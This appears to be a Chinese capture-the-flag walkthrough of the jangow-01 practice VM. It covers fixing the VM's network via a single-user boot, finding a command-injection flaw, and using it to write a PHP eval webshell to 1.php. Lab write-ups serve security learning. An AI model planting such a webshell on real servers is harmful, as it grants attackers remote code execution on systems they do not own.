当前位置: 首页 > news >正文

jangow-01-1.0.1靶机

一、找ip和端口

我们发现只能扫描出主机的IP,可能是虚拟网卡配置的问题。尝试去修改一下虚拟网卡配置问题。

重启虚拟机,在启动时按住shift,出现了下面这个界面后按e,然后找到ro修改成rw single init=/bin/bash。

修改完后按Ctrl + X ,输入ip a 查看网卡ens33,然后cd 到etc/network,然后vim interfaces。修改内容如下图。(注意:要一级一级去cd)

这样就可以扫描到我们的ip和端口了。

访问一下主页。

二、利用漏洞

点site出现了下面的页面,把页面上的按钮点个遍,发现点击右上角的“buscar”按钮会跳转,

尝试输个id,发现了命令执行漏洞。

利用漏洞输入一句话木马,然后访问1.php,用工具去连接。

echo '<?php @eval($_POST[a]);?>' > 1.php

http://www.dtcms.com/a/301659.html

相关文章:

  • Java 后端 Cookie Session Token会话跟踪技术
  • Maven之多模块项目管理
  • c# everthing.exe 通信
  • Level MC-9“恶地”
  • 1.qt历史版本安装与多版本开发(解决被拦截问题)
  • 青少年编程能力等级测评试卷及答案 Python编程(三级)
  • 《频率之光:共生之恋》
  • C9300L Stacking堆叠
  • 人形机器人指南(十)决策
  • 快速了解线性回归算法
  • Item16:成对使用new和delete时要采取相同形式
  • Sklearn 机器学习 数值指标 混淆矩阵confusion matrix
  • Java知识体系
  • 初识 docker [上]
  • 【高等数学】第六章 定积分的应用——第三节 定积分在物理学上的应用
  • GO语言 go get 下载 下来的包存放在哪里
  • 线程安全问题的发现与解决
  • 2025 DevOps开源工具全景指南:构建面向未来的智能交付体系
  • 嵌入式软件面试八股文
  • 面试150 数字范围按位与
  • PLLIP核
  • 测试老鸟整理,物流项目系统测试+测试点分析(一)
  • 【笔记】Gibbs自由能全微分公式推导
  • AJAX 原理_第一节_XHR 对象
  • 免安装MySQL启动全解:从解压到远程访问的保姆级教程
  • U盘中毒,文件被隐藏的解决方法
  • Redis6.0+安装教程(Linux)
  • Map系列
  • docker搭建部署 onlyoffice 实现前端集成在线解析文档解决方案
  • 车载诊断架构 ---面向售后的DTC应该怎么样填写?